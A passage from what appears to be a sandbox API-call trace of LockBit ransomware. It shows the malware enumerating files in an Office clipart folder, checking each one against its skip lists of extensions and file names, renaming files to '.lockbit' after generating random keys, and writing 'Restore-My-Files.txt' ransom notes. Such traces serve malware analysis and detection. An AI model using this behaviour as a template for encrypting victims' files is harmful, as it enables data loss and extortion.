nFileSizeLow=0x1d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00161_.GIF", cAlternateFileName="")) returned 1 [0101.523] lstrcmpiW (lpString1=".", lpString2="AG00161_.GIF") returned -1 [0101.523] lstrcmpiW (lpString1="..", lpString2="AG00161_.GIF") returned -1 [0101.523] PathFindExtensionW (pszPath="AG00161_.GIF") returned=".GIF" [0101.523] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.523] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.523] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.523] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.523] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.523] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.523] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.523] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.524] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.524] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.524] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.524] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.524] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.524] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.524] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00161_.GIF") returned 1 [0101.525] lstrcmpiW (lpString1="ntldr", lpString2="AG00161_.GIF") returned 1 [0101.525] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00161_.GIF") returned 1 [0101.525] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00161_.GIF") returned 1 [0101.525] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00161_.GIF") returned 1 [0101.525] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00161_.GIF") returned 1 [0101.525] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00161_.GIF") returned 1 [0101.525] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.525] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned=".GIF" [0101.525] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.525] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.525] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.526] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.526] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.526] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.526] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.526] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.526] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.lockbit") returned 72 [0101.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcb4 [0101.527] CreateIoCompletionPort (FileHandle=0xcb4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.527] malloc (_Size=0x40068) returned 0x3ef0008 [0101.527] GetFileSizeEx (in: hFile=0xcb4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=7583) returned 1 [0101.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0101.528] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0101.530] ReadFile (in: hFile=0xcb4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.536] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.536] malloc (_Size=0xa6) returned 0x77d800 [0101.536] NtSetInformationFile (FileHandle=0xcb4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.536] free (_Block=0x77d800) [0101.536] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.536] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.536] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65e47e00, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65e47e00, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x1b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00163_.GIF", cAlternateFileName="")) returned 1 [0101.537] lstrcmpiW (lpString1=".", lpString2="AG00163_.GIF") returned -1 [0101.537] lstrcmpiW (lpString1="..", lpString2="AG00163_.GIF") returned -1 [0101.537] PathFindExtensionW (pszPath="AG00163_.GIF") returned=".GIF" [0101.537] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.537] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.537] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.538] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.538] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.538] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.538] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.538] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.538] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.539] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.539] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.539] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.539] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00163_.GIF") returned 1 [0101.539] lstrcmpiW (lpString1="ntldr", lpString2="AG00163_.GIF") returned 1 [0101.539] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00163_.GIF") returned 1 [0101.539] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00163_.GIF") returned 1 [0101.539] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00163_.GIF") returned 1 [0101.539] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00163_.GIF") returned 1 [0101.539] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00163_.GIF") returned 1 [0101.539] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.539] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned=".GIF" [0101.539] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.539] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.539] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.539] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.540] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.540] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.540] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.540] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.540] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.540] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.540] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.540] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.lockbit") returned 72 [0101.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xca0 [0101.547] CreateIoCompletionPort (FileHandle=0xca0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.547] malloc (_Size=0x40068) returned 0x3e70078 [0101.548] GetFileSizeEx (in: hFile=0xca0, lpFileSize=0x3e70090 | out: lpFileSize=0x3e70090*=6984) returned 1 [0101.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb00ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb00ac) returned 0x0 [0101.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb00bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb00bc) returned 0x0 [0101.551] ReadFile (in: hFile=0xca0, lpBuffer=0x3e700ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078) returned 0x0 [0101.557] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.557] malloc (_Size=0xa6) returned 0x77d800 [0101.557] NtSetInformationFile (FileHandle=0xca0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.558] free (_Block=0x77d800) [0101.558] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.558] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.558] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d0800, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d4d0800, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x33c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00164_.GIF", cAlternateFileName="")) returned 1 [0101.558] lstrcmpiW (lpString1=".", lpString2="AG00164_.GIF") returned -1 [0101.558] lstrcmpiW (lpString1="..", lpString2="AG00164_.GIF") returned -1 [0101.559] PathFindExtensionW (pszPath="AG00164_.GIF") returned=".GIF" [0101.559] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.559] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.559] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.560] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.560] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.560] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.560] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00164_.GIF") returned 1 [0101.560] lstrcmpiW (lpString1="ntldr", lpString2="AG00164_.GIF") returned 1 [0101.560] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00164_.GIF") returned 1 [0101.560] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00164_.GIF") returned 1 [0101.560] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00164_.GIF") returned 1 [0101.561] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00164_.GIF") returned 1 [0101.561] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00164_.GIF") returned 1 [0101.561] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.561] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned=".GIF" [0101.561] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.561] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.561] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.561] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.561] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".sqlite", 